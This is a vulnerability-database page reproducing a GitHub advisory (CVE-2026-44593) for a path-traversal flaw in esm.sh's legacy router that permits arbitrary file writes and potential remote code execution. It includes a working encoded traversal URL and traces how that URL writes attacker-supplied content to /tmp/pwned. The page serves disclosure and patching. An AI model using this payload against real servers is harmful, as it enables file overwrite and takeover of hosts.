What is GHSA-3636-h3vx-6465?

GHSA-3636-h3vx-6465 is a security advisory published by GitHub Security Advisories with High severity. esm.sh: Legacy Route Path Traversal Can Lead to RCE

Which CVE IDs does GHSA-3636-h3vx-6465 cover?

GHSA-3636-h3vx-6465 covers the following CVE IDs: CVE-2026-44593. Each CVE has its own detail page on EchelonGraph Pulse with the synthesized EG score.

Which products are affected by GHSA-3636-h3vx-6465?

GHSA-3636-h3vx-6465 affects 1 product, including: go/github.com/esm-dev/esm.sh:\u003c 0.0.0-20260508100112-1960055e1d53.

GHSA-3636-h3vx-6465High

esm.sh: Legacy Route Path Traversal Can Lead to RCE

Vendor

GitHub Security Advisories

Published

May 12, 2026

Last Modified

June 9, 2026

🔗 CVE IDs covered (1)

CVE-2026-44593 →

📋 Description

Impact

Arbitrary File Write – An attacker can cause the server to write data to any file path it has write permission for.
Privilege Escalation / RCE – By overwriting critical binaries or scripts, the attacker can execute arbitrary code with the server’s privileges.

Exploit

The legacy router first retrieves a response from legacyServer, parses the incoming request path, and ultimately writes the data to storage via buildStorage.Put
(see https://github.com/esm-dev/esm.sh/blob/4312ae93e518121e764a18bb521af12e490ef137/server/legacy_router.go#L291).

For a URL such as:

http://ESM_SH_HOST/v111/react@19.2.0/esnext/..%2f..%2f..%2fgh/<attacker>/exp@1171e85d5d/foo.md%23%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2ftmp%2fpwned

the router concatenates the path components without sanitizing them, producing a storage key like:

legacy/v111/react@19.2.0/esnext/../../../gh/<attacker>/exp@1171e85d5d/foo.md#/../../../../../../../../../../tmp/pwned

When this key is used, the underlying file system resolves the relative segments and writes the file to /tmp/pwned. Thus an attacker can craft a request that writes data to arbitrary locations on the server.

Details

URL Construction
A crafted request is sent to the server:

http://ESM_SH_HOST/v111/react@19.2.0/esnext/..%2f..%2f..%2fgh/<attacker>/exp@1171e85d5d/foo.md%23%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2ftmp%2fpwned

Proxy to Legacy Server
The request is forwarded to:

http://legacy.esm.sh/v111/react@19.2.0/esnext/../../../gh/<attacker>/exp@1171e85d5d/foo.md#/../../../../../../../tmp/pwned

which resolves to:

http://legacy.esm.sh/gh/<attacker>/exp@1171e85d5d/foo.md

File Retrieval
The server fetches foo.md from the GitHub repository https://github.com/<attacker>/exp.
Path Normalisation & Storage
The storage path derived from the request is:
```
legacy/v111/react@19.2.0/esnext/../../../gh/<attacker>/exp@1171e85d5d/foo.md#/../../../../../../../../../../tmp/pwned
```
Normalising this path yields /tmp/pwned. The retrieved file content is then written to that location.
Result
By repeating this pattern, an attacker can overwrite arbitrary binaries or scripts on the server, paving the way for remote code execution.

esm.sh: Legacy Route Path Traversal Can Lead to RCE

🔗 CVE IDs covered (1)

📋 Description

Impact

Exploit

Details

Credit Discovery To

🎯 Affected products1

🔗 References (4)